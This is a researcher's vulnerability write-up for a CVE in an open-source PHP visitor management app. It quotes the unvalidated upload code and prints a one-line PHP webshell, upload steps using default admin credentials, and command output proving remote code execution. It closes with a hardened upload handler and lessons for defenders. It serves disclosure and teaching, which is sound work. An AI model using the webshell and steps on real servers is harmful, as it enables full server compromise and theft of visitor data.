Introduction

My name is Varad AP Mene, an independent security researcher and bug hunter from India. Over the past few years I have been actively hunting vulnerabilities across the web and have successfully secured 100+ organizations including tech giants like NVIDIA, NASA, and many more through responsible disclosure.

Along with bug bounty hunting, I also research open source web applications for CVE discoveries. This is my second CVE that I am actively publishing and it is the most impactful one so far. Remote Code Execution means full server compromise.

This vulnerability allows an authenticated admin to upload a PHP webshell and achieve full Remote Code Execution on the server: complete server compromise with just one file upload.

What is a CVE?

A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known security vulnerability. CVEs are managed by MITRE and published on the National Vulnerability Database (NVD). Having a CVE assigned to your name means you discovered a real, verified security vulnerability that affects real users and systems.

The Target

Product: Visitor Management System v1.0
Vendor: sanjay1313
URL: https://github.com/sanjay1313/Visitor-Management-System

Visitor Management System is a PHP/MySQL web application used by organizations to manage visitor records. It handles sensitive data like visitor names, contact details, and visit history.

How I Found It

I was auditing open source PHP web applications looking for common vulnerabilities. I downloaded the Visitor Management System and started reviewing the source code manually.

The first thing I always look for in any web application is file upload functionality — it is one of the most dangerous features if implemented incorrectly.

I found two files with upload functionality:

vms/php/admin_user_insert.php   ← Add new admin user
vms/php/update_1.php            ← Update admin user

Inside both files I found this code:

$image = $_FILES['image']['name'];            // client-supplied filename, used as-is
$tmp = $_FILES['image']['tmp_name'];          // PHP's temporary upload path
move_uploaded_file($tmp, "../images/" . $image); // saved into the web-accessible images/ directory

Three lines. Zero validation. No MIME type check. No extension check. No content verification. The file is saved directly with its original name.

Understanding the Vulnerability

When a file upload has no validation, an attacker can upload any file type — including PHP scripts. PHP scripts uploaded to a web-accessible directory can be executed by simply visiting their URL in a browser.

Normal intended flow:

Admin uploads profile photo → JPEG saved → shown in UI

Attack flow:

Admin uploads shell.php → PHP file saved → 
visited via URL → arbitrary commands executed

Why is this dangerous?

When a PHP webshell is uploaded and executed, the attacker can run any command on the server as the web server user (typically www-data on Linux). This means:

  • Read any file on the server
  • Write files anywhere the web server has permission
  • Delete files
  • Pivot to other internal systems
  • Exfiltrate all database credentials
  • Steal all visitor data

This is why Remote Code Execution is considered the highest severity class of web vulnerability.

Setting Up the Lab

I set up a Docker lab to safely test the vulnerability. Never test on production systems — always use a local lab.

Confirming the Exploit

Step 1 — Create a PHP webshell:

<?php system($_GET['cmd']); ?>

Save this as shell.php

Step 2 — Login to admin panel:

URL: http://localhost:8080/vms/
Username: admin
Password: admin (default)

Step 3 — Upload shell.php as profile photo:

Navigate to: Admin Users → Add New Admin
Upload shell.php as the profile image field
Submit the form

Step 4 — Execute commands:

http://localhost:8080/vms/images/shell.php?cmd=id

Result:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Full Remote Code Execution confirmed!

Impact Analysis

This vulnerability affects any organization using Visitor Management System 1.0. The impact includes:

Confidentiality: All visitor records, admin credentials, and database contents can be read.

Integrity: An attacker can modify or delete any data on the server.

Availability: The entire server can be taken offline or ransomware can be deployed.

The CVSS score of 7.2 (High) reflects this severity; the rating is tempered only by the requirement of admin authentication.

Proof of Concept Script

I wrote a Python script to automate and demonstrate the exploit. The full PoC script is available at: https://github.com/menevarad007/CVE-2026-37748

Reporting the Vulnerability

After confirming the vulnerability, I followed responsible disclosure:

  1. Submitted to MITRE via https://cveform.mitre.org
  2. Waited for CVE assignment — received CVE-2026-37748
  3. Created public advisory at https://github.com/menevarad007/CVE-2026-37748
  4. Notified the vendor via GitHub Issues
  5. Notified MITRE about publication

CVE Details

Lessons Learned

  1. Always check file upload functionality first — it is the most dangerous feature
  2. Never trust file extensions — validate MIME type using finfo_file()
  3. Always rename uploaded files — never use the original filename
  4. Store uploads outside webroot — or block PHP execution in upload directory
  5. Responsible disclosure protects everyone — report before publishing
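The following is an added example, not code from the Visitor Management System, showing how the three-line handler above could be rewritten to follow lessons 2 through 4: content-based type detection with finfo_file(), a server-generated filename, and a storage directory outside the webroot. The directory path, size limit and function name are assumptions.

```php
<?php
// Added example, not the project's code: a hardened replacement for the
// three-line upload handler above. Assumes the same $_FILES['image'] field.
declare(strict_types=1);
// Assumption: a storage directory outside the webroot, so nothing in it
// can ever be executed by visiting a URL.
const UPLOAD_DIR = __DIR__ . '/../../private_uploads';
const MAX_BYTES  = 2 * 1024 * 1024; // 2 MiB

// Allowed types keyed by the MIME type finfo_file() reads from the file
// content, mapped to the extension we assign (the client's name is ignored).
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function store_profile_image(array $file): string
{
    // 1. Reject anything PHP did not accept as a clean, complete upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed, error ' . $file['error']);
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('Not an uploaded file or too large');
    }

    // 2. Decide the type from content, never from the client-supplied name
    //    or Content-Type header.
    $mime = finfo_file(finfo_open(FILEINFO_MIME_TYPE), $file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('Disallowed file type: ' . $mime);
    }
    // A real image must also parse as one (catches files that only start
    // with image magic bytes).
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('File is not a valid image');
    }

    // 3. Generate our own random filename; the original name is never used,
    //    so shell.php can never land on disk as shell.php.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        throw new RuntimeException('Cannot create upload directory');
    }
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('Could not store file');
    }
    // Return the generated name for the DB; serve it through a read-only
    // handler (readfile with a fixed image Content-Type), not a direct URL.
    return $name;
}
// Usage in admin_user_insert.php / update_1.php (replaces the three lines):
// $stored = store_profile_image($_FILES['image']);
```

If the images must stay under the webroot for compatibility, the same handler still applies, but the directory should additionally have PHP execution disabled at the web server level (for example, an Apache directory rule that refuses to hand .php files to the interpreter).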

What's Next

This is my second actively published CVE.

My CVE portfolio so far:

  CVE-2026-37748 — File Upload RCE ← This one
  CVE-2026-37749 — SQL Injection Auth Bypass

All discovered in just 4 weeks of research.

References

Varad AP Mene — Independent Security Researcher

Email: menevarad007@gmail.com

GitHub: https://github.com/menevarad007